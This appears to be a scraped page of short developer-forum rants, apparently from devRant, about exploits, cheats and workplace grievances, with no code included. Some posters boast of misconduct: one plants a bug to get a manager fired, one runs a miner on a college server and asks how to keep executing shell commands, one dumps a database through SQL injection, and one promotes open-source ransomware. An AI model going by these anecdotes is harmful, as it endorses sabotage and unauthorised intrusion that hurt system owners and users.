Whatever.... job pays the bills pretty well... Sorta boring as I'm like the biggest fish on the whole team but that's also the upside I guess... May not be true but I think I'm pretty hard to fire...
So now it's sorta 20% work 80% life... So guess I'm done exploring and just gonna exploit...
P.S I wore this while taking a break from solo karaoking.... (Thursday night)12
Got started by making farmville cheats. Found many exploits. Best was when I found 3 ways to do the same exploit. Zynga kept patching and I kept releasing a new way.
Lasted for just over a year or so.
Played for like 3years and then got bored. Those were the golden days, really miss them.7
I fucking hate it when professional rivalry affects the students. I am a student and for some unknown fukin reasons there is some kind of professional rivalry in the higher ends of my college. The effect of this is unwanted criticism and loads of pressure on us, the students, to outperform the students belonging to the other part (of the rivalry). What the fuck.
If you are in such a field, make sure that your rivalry with someone else does not affect the ones who seek knowledge and learning. It is not right to harass and exploit people who respect you and come to you for learning. It not only affects you but also whole lot of people who look forward for some kind of professional behaviour from you. Keep rivalry away from students. Work for what is necessary and get the things done. It is as simple.4
I read this rant on Quora. Is this true ?
“The IT industry has devolved into a gigantic ponzi scam built on exploitation and BS. Quality of solution and quality of work was replaced with a ‘Does it work now?’ approach with zero contingency.
And the fact that geeks and nerds are naive only helps the white collar crooks to exploit them as code monkeys.”12
*News for the users here that deal with web hosting here*
Hey there anyone that vaguely remembers me, so have been busy with my network lately dont have much time to get back here, I dont know if someone has already reported this new, I found it while I was scooting for news to share on my site (shameless plug: https://legionfront.me/pages/news)
Its about our loved /s and highly used Wordpress and its lovely code /ss
Short story short if, there is an exploit (of the many) to DDoS a network of worpress sites that has been present since almost literally forever, the code to fix it is in the article8
I am learning exploit development on Windows and I have a problem with it, when I analyze the registers ESP and EIP.
I am able to overwrite both ESP and EIP.
The problem is that I can not make use of "mona.py". "Mona.py" keeps showing me that there are no pointers and any os dlls whereas that is not true.
Immunity Debugger is working completely fine.
I need "mona.py" to find pointers to ESP, but it says there is none.4
Most of my private code is created in the evening hours and after one to two beers, so I got that covered pretty well - though if you want to see what happens if you code literally shitfaced, just go play Mafia 3. That deterred me from trying.
The one thing I did at a party was fix a computer after (I think) 4 beers. Apparently I got it together because the sounds worked after that, but don't ask me how. Besides, it had OSX, I usually avoid that thing like the plague. I guess getting drunk means I can handle even that shit.
1-2 Beers is the max I still can code (or properly think) with. Any more and I can't get a single line out.
Worst thing I tried was coding high. I was on a short trip to Amsterdam and a friend of mine brought on some White Widow...
Yeah, I could focus alright... The code worked and the program was done in two hours (It was an exploit for... well, lets not get into details here).
When I reread the code while not high anymore, it might as well have been binary (it was Python). I could, for the life of me, not figure out what the hell I had been writing there or how/why it worked - but it did its job.
Never again. I mean, WW is my favourite and I hear a lot of artists use it to enhance their "flow" when creating art...
I guess it makes sense to code on that, but I generally try to avoid flow when coding - it makes you produce unreadable and unmaintainable code.1
LinkedIn: Exploiting social psychology for fun and profit.
I was reading an excellent post by Kage about linkedin (you can find it and more here - https://devrant.com/users/Kage) a little while ago and it occurred to me the unique historic moment we are in. Never before have we been so connected in history. Never before have we had so great an opportunity to communicate with strangers (perhaps except for sketchy candy vans on college campuses, and tie dye wearing guys distributing slips of paper at concerts). And yet today, we are more atomized than ever before. In this unprecedented era of free information, and free communication, how can we make the most of our opportunities?
The great thing about linkedin is all the fawning morons who self select for it. They're on it. They're active, so you know they're either desperate attention hungry cock goblins,
self aggrandizing dicknosed cretins, desperate yeasty little strumpets, or a managerie of other forgetable fucking pawns,
willingly posting up their entire lives to be harvested and sold so someone can make 15 cents on a 2% higher ad conversion ratio for fucking cilas or beetus meds.
So what is a psychopathic autist asshole to do?
Ruthlessly exploit them by feeding them upvotes, hows-it-going-guys, and other little jolts of virtualized feel-good-chemical bullshit.
Remember the quickest way to network is for people to like you. And the quickest way to make people like you is either agree with them on everything, or be absolutely upfront with everything you disagree on.
Well, they'll love you, or hate you. But at least you'll be living rent free in their head. And that means they'll remember you when you call looking to network or get a referal.
Of course, in principle, this extends to any social media site. Why not facebook? Why not fucking *myspace*? Why not write a script in selenium to browse twitter all day, liking pictures of lattes and dogs posted by the lonely and social-approval-hungry devs working at places like google, twitter, faceborg, etc?
You could even extend this to non-job prospects. Want a quick fuck? Why, just script a swipe-right hack on tinder, or attach a big motherfucking robot arm to your phone, tapping and swiping for hours. Want to make a buck? Want not harvest data on ebay or amazon all god damn day and then run arbitration for 'wanted' classifieds on craiglist?
Why not automate all the things?
The world is at your fingertips, and you the power to automate it, while all the wall lickers and finger painters live oblivious to the opportunity they are surrounded with and blessed with daily.
Surely now that you know, it is your obligation, nay, your DUTY to show the way.
Now you are learned. Now you are prepared. Go forth and stroke the egos of disposable morons to bilk for future social favors while automating the world in ways never intended.2
ARE YOU FUCKING KIDDING ME!!!!!
IT'S A FUCKING VPN AND THEY CAN'T FUCKING PROTECT IT'S CONFIG FILES FROM JS!!!!!
ooh first rant with dvorak2
My best friend's ex is really cool. But while they were dating, I was a bit frustrated, mainly because he was interested in many things she wasn't.
One thing that annoyed me was that his major is computer science, and her major is medical research.
GIRL, IF ONLY YOU WERE ALSO MAJORING IN COMPUTERS. YOU CAN ASK THE GUY FOR HELP WITH YOUR ASSIGNMENTS. EXPLOIT HIIIIM. HAVE COFFEE DATES AT STARBUCKS AND CODE TOGETHEEER. HIT TWO BIRDS WITH ONE STONE10
!rant Scary Stuff...
Not sure what are the rules on sharing external content, but this story freaked me out and I wanted to share with you.
Pretty scary stuff, maybe something like this is already in the wild? Especially with the NSA and other power groups trying to exploit vulnerabilities and infiltrate everything...
Found it originally on the rational subreddit. Here is the link:
It's about the The Ken Thompson Hack:
"Ken describes how he injected a virus into a compiler. Not only did his compiler know it was compiling the login function and inject a backdoor, but it also knew when it was compiling itself and injected the backdoor generator into the compiler it was creating. The source code for the compiler thereafter contains no evidence of either virus."
How to detect/deal with something like this? better no to think too much about this.1
Exploit development is a really great topic.
The best decision I have made so far.
I tried to do that sort of thing 8-10 years ago, but that was the script kiddie me... To that comes that that my attention span was very low. That is showing the state of my low will power.
You really got to hang in there to go further.
Without extreme will power, you simply won't make it. You will become very frustrated. That's normal. Just never give up on it. Keep retrying. In the end it pays out.
It has a steep learning curve, but in the end you learn so many fricking things.1
People going crazy over the new Intel CPU exploit. I'm just sipping coffee looking at my AMD CPU that's never done me wrong 🙌15
My Project Lead got me to work overtime, I was doing 150% of what I was supposed to do.
After 4 months of tremendous working and smart planning, I planted a small bug in the software we build, and used that to exploit the Software yesterday morning, and today by 3 PM (Our Usual. Lunch Time), He was fired.
Finally, that donkey is fired and now he must rotten in hell, yeah, he got that stamp on his resume for being fired.
Now I am feeling guilty that I have almost ruined his career (30%), but I am happy, that rascal got what he deserved (70%). Yay!4
So I get three wishes, right? Great! I wish I lose 3 wishes.
By that logic I start at three, minus one for the wish, and then proceed to lose another three leaving me at -1. So by our logic, we’d be back at 3 due to underflow.
To exploit this, make one genuine wish and then ask to lose two wishes, underflowing again.
It’s all in how you play the game.8
Got bit by a hacked repo. It was compromised for all of like 30-some seconds. No intrusions, but now I can't set my root password (passwd goes "oh, yeah, we got this" then it does... nothing...) and Weyland/X/Gnome/Cinnamon/KDE/whatever the kids use nowadays are all busted (they all start, but they just hang tty1 and whatever other console invoked it). Tried reinstalling all those kinds of things, didn't help.
Some companies do not hold ethics. They believe that developers are easily available in market and can be replaced any day.
These companies talk about serving notice periods for longer term, and than if they employ some one by then.. the management so called finds flaws in u and asks to leave before completing service period.
When the developer agrees to leave they realise the developer is currently developing a project for the benefit of the same company , than they increase the reliving date again. I mean why can't they be certain on what they want?
These kind of companies only knw to exploit and extract young developers knowledge and every developer should be aware of this type of people .
Also evaluating and review a code cannot be done in few seconds without e1 knowing the project, and specially by some one who holds same experience as u . Bt in only 1 framework . So junior developers before absorbing any feedback from any evaluator, please try to understand the person's background and knowledge in the field he is evaluating u in .4
So, there was this time I was a security intern for google, It was my first day as an intern tho :p and I got a little excited about exploring stuff and all at the workplace. Me having a large appetite was mesmerized by the food supplied over there.
I might have sat approximately 2 hours over there fantasizing about how much could I save over food by eating a lot over here and taking some to home.
Then came the SE/SDE guys over my place and we started discussing how there was a loophole here and how one could exploit it. All were heads over heels how was I making calculations for "my" property. All seemed to be pretty interested except for one guy. This guy was over excited how I was managing this and slacking off over the first day. He happened to be a senior lead architect, turns out he shows too much interest in anything he finds suspicious. This wasn't supposed to be rant, but yeah. My story.
Tying to make something of myself without working for anyone else.
It used to be easy for me, but fear kept me from perusing things all the way thru when I was younger. I never wanted to leave what were decent jobs at the time.
I finally did it. Threw away a very good job to bet on myself.
But the difference is, now I have a family and finding free time in itself isn’t that hard, but finding free time to code uninterrupted for hours... the way one needs to in order to hold a program in ones mind... yeah, near impossible these days, haha.
I have great ideas but I need help to get things to that ‘next level’ where an idea could take off and get real investments. And I need money to pay the help... Just getting the ball rolling would be nice. I used to take it for granted how easily I could get side jobs and be literally the best in town. But now it’s insanely competitive. I don’t even consider Webdesign an option for side work anymore, with sites like Wix and customers that don’t appreciate what I do vs a kid that gives them a Wordpress theme for just the cost of dirt cheap hosting... traditional Webdesign is dead.
But that’s all well and good, i saw that coming over a decade ago and focused more on coding application. I do think there’s a niche for my programming skills, so my current goal is trying to exploit that, or at least see if it’s viable. I just need something to get money to invest in my real projects.
I’d love to hear from people with similar situations! Not sure if I’ll pull it off before I have to go back to work. Although, I viewed never returning to the workforce haha. We’ll see...
Right now, everything. I started at a Consulting firm because I expected many new problems to tackle, solutions to develop and generally to always have a fire burning underneath my ass but instead I always develop the same standard bullshit.
I miss the days in my old job when there was just a problem and the task to solve it. When I stared down giant amounts of data, just KNOWING that somewhere in that mess is some structure I could exploit and that short moment of inspiration when I finally pinpointed it. The rush of endorphins when the solution became clear and everything fell into place to form a beautiful pattern amidst the chaos test data, git commits and numpy arrays.
Now its just "Yeah, would you just write another selenium testsuite that throws out fail or pass and wastes all the information because the only reason I'm a testmanager is because I'm too incompetent to do anything else and not my passion for the field".
The constant, mind numbing repetition of always the same patterns where the occasional dynamic element that becomes stale is the highlight of my work week... I would have never thought that making good money with easy work would ever get me as close to depression as it did.6
What's up with those fucking internships? Is it a new way to exploit people and have someone do all the hard work that no one else wants to do but for free?
Oh and by the way, if your company is worth more than 10 million dollars and you still have unpaid internships FUCK YOU.5
4200 php files with exploit code removed or cleaned and 12 hours of work, and I can cautiously sigh a relief2
I would get a testing job and thus exploit weaknesses in the ai- created software.
After finding such weaknesses, I would write AI debilitating viruses and WannaCry-like ransomware until I get my job back!
If that doesn't work out, I'd go into linguistics.1
How to discover and exploit vulnerabiliy in program or IoT firmware?C++, asm, writing zero-days, i have always been amazed by that. Art.1
I think it's safe to say I'm not a big (medium) fish in a small ponds.
But now thinking more and more it's it's worth the time that I've already interested plus another unknown amount to try to become a little fish in a bigger pond...
I am new to c and cpp.
I used to exploit my college's competitive programming platform cus it had a bad architecture and almost no auth checks.
For every ajax request, they weren't sending auth tokens or any form of identification and ran all the programs without any logs and on the main thread and as root.. wtf, right?
But recently they've changed something to the site and I cannot run bash commands using system() call.
Is there any other way to execute bash commands using c and cpp.
I already configured a miner in their server but then they re-deployed it cos someone forked bomb the shit out of it.
I'm a noob in c and cpp btw!3
I need your advice about deciding wether to work as a freelancer for a startup or no.
So this French startup is couple years old and they decided to build a team in my country. I went to the interview few weeks ago and we discussed the projects, details, potential salary and everything seemed great.
Couple days ago I received a service contract from them and now I need to decide to work for them or no.
Plan is for them to come to my country, rent an office and I should go there and work for them.
The salary that they offered is medium level and they will not have any legal entity in my country. However it’s not a problem for me since I have my own LTD company so I would pay salary on my own.
However there are some cons:
My team members are being hired as freelancers, however salary is defined with a daily rate instead of hourly and we are allowed to work maximum 20 days a month. It is not clear how many hours a week/month they will expect us to work and at this point I’m afraid to rock the boat with my questions. I understand that I shouldn’t receive any health insurance, sick leave pays, vacation days, home office, pension contributions and so on. But it’s so weird that they pay per day instead of per hour. It screams with unpaid overtime.
Payment time is 30 days after invoice has been sent. So If I started working from September 01, I will send them invoice at September 30, then I will work all October and will receive my money only around end of October. Working 60 days to receive my first salary doesn’t seem nice.
Notice period is 30 days. Which is fine on my end since I can be completely free after initial notice. But in their case if they want to fire me I guess they will simply not give me any work to do and since I’m charged per day I won’t be able to send them any invoice. No employment safety, which means if after 2-3 months they don’t have anything to do I can get royally screwed. But it’s startup nature I guess?
They don’t provide a laptop to work with. I’m lucky since I have a laptop for developing mobile apps, and they said they will at least provide office to work in and a monitor.
All this situation is sending vibes of "we want to save money so we came to your country for cheap labour and now we gonna exploit you"
What complicates matters is that my sister will be working with me and It’s her first job. They agreed to pay her a decent salary and even be flexible with her studies. However this deal for me does not seem too great as I will be receiving mid level salary with no benefits that I would otherwise get.
On the other hand maybe I'm just overthinking this I can just try it out for few months and see where it goes.
Probably the first time I actually wrote a poc exploit for something we didn't write but were trying to win the maintenance contract for. I remember being In a pre-tender meeting showing it off to the potential client. Their face was amazing as my little script exported their database by exploiting some very shady search functionality.
PS. I had permission to do it, don't break systems you don't have permission to break, we also won that contact 😁
F Apple. I've got their touch-driven, motion-sensing, centimeter-thick, supercomputer (by 1990 standards) from 2012, and I can't fscking run Linux on it because my only official choices are the old iOS 7.0.0 over-the-air update and the newest iOS 9.3.5, and no one has published how to get root to either stupid OS so I can run an exploit on the stupid fucking boot loader.4
Any disposable e-mail address service:
"FIGHT THE SPAM"
"THANK YOU FIGHTING THE SPAM"
"YOU DID GOOD BY FIGHTING SPAM"
The users of disposable e-mail address:
*creates another spam account*
*creates another multiaccount in order to exploit a system*
Companies actually fighting spam:
Now there is even more spam to fight against. (which is not good)
About 2/3 of the accounts created daily on our website are spam accounts. We have to waste our time with this shit instead of actually improving our services. Since we do not track IP-Addresses and there are countless amounts of disposable e-mail domains AND there is still the option to create countless spam e-mail addresses within legit e-mail providers, there is no easy way of stopping this madness.
"Fight the Spam", you could start by deleting your shitty service or at least give us a list of all the domains you're using, srsly.
When the pen testers find a "vulnerability" and say it would be very difficult for someone to exploit it. Yeah, in that case they might as well say if you solve p vs np you can break it but it would be very difficult.
Crypto! I've always thought of crypto as some complicated black box! How does it work, but then I did the cryptopals challenge and learned to exploit cryptography. What to do with this new found knowledge? Write new libraries and ransomware of course! So I present two projects that taught me a lot!
Pydhe, possibly the first(!!!) Open source diffie Hellman library for python. (Yea I know openssl, but they don't let you do diffie hellman without TLS. I do!) https://github.com/deadPix3l/pyDHE
And Cryptsky! One of the first ever fully python, opensource ransomware! (Again caveat, most open source python ransomware isn't truely licensed as OSS or uses some lower functions written in C)
Microsoft announced a new security feature for the Windows operating system.
According to a report of ZDNet: Named "Hardware-Enforced Stack Protection", which allows applications to use the local CPU hardware to protect their code while running inside the CPU's memory. As the name says, it's primary role is to protect the memory-stack (where an app's code is stored during execution).
"Hardware-Enforced Stack Protection" works by enforcing strict management of the memory stack through the use of a combination between modern CPU hardware and Shadow Stacks (refers to a copies of a program's intended execution).
The new "Hardware-Enforced Stack Protection" feature plans to use the hardware-based security features in modern CPUs to keep a copy of the app's shadow stack (intended code execution flow) in a hardware-secured environment.
Microsoft says that this will prevent malware from hijacking an app's code by exploiting common memory bugs such as stack buffer overflows, dangling pointers, or uninitialized variables which could allow attackers to hijack an app's normal code execution flow. Any modifications that don't match the shadow stacks are ignored, effectively shutting down any exploit attempts.5
My robotics mentor who had never said anything about computers asks some of our good programmers where he can buy 20 raspberry pi zeros.
The next day the PoisonTap exploit goes public.
I created a custom interface for an LMS that allows students to see their marks even if they haven't been 'shared' yet by their teachers. This is all done without accessing any unauthorized apis, as the LMS always returns all student marks and then hides the ones with a False 'shared' key. School administration caught me, so I've now shut it down. I have a meeting with the deans tomorrow. Any advice? (Again, this is all done using existing methods found within this LMS)5
I don't wanna be specific today, so I'll just post a song exerpt.
I love you, I hate you, I'm on the fence, it all depends
Whether I'm up or down, I'm on the mend, transcending all reality
I like you, despise you, admire you
What are we gonna do when everything all falls through?
I must confess, I've made a mess of what should be a small success
But I digress, at least I've tried my very best, I guess
This, that, the other, why even bother?
It won't be with me on my deathbed, but I'll still be in your head
Put me on a pedestal and I'll only disappoint you
Tell me I'm exceptional, I promise to exploit you
Give me all your money, and I'll make some origami, honey
I think you're a joke, but I don't find you very funny
It is sometimes shocking to see 10+ developers working on a fairly big project (online quiz). Missing data binding operations here and there, as a result, bunch of sql injections, which successfully led to the entire db full of questions and answers sitting on my desktop.
Vulnerabilities have been reported, took them 2 weeks to understand what happened and fix them.
Pretty sad :/1
I did learn c and c++. When i got my first job it was support related as Attending calls and providing solutions.
As time passed i came to know that the application company was building has many flaws. From there i learned to exploit that flaws.
So flaws made me to learn to programme. I was 21 when i started. I am 29 now.
Ok so I'm parts UI/UX designer in a corporate setting so I use graphic editing software like Photoshop rather extensively.
Obviously, I'm confronted to a lot of admin rights restrictions, which is to be expected.
What I'd like to know is why the f*** does ADDING A FONT in W10 require admin rights ?
What's potential security loophole could one exploit using TrueType font installation exactly ? Or are they afraid someone's going to remove all system fonts from the Fonts folder ? Anybody that does that shouldn't be allowed access a computer afterwards.3
If you’re not using Chrome or Safari, watch out for this new exploit!
Well, as I do exploit dev, I read writeups on exploits as they come out, and test them out if possible.
I should check out the latest videos at egghead.io, I should convert to Angular 2, I should start using es2016, I should learn c, I should continue on the cryptopals challenges, I should fully understand floats, I should learn how java works under the hood, I should learn the details of how the drammer exploit were done, I should make a dinner planner, I should continue the Golang tutorial, I should check out the game of my colleague's game attempt, I should engage in an open source project...
Playing cs:go with a nagging bad conscience... Again!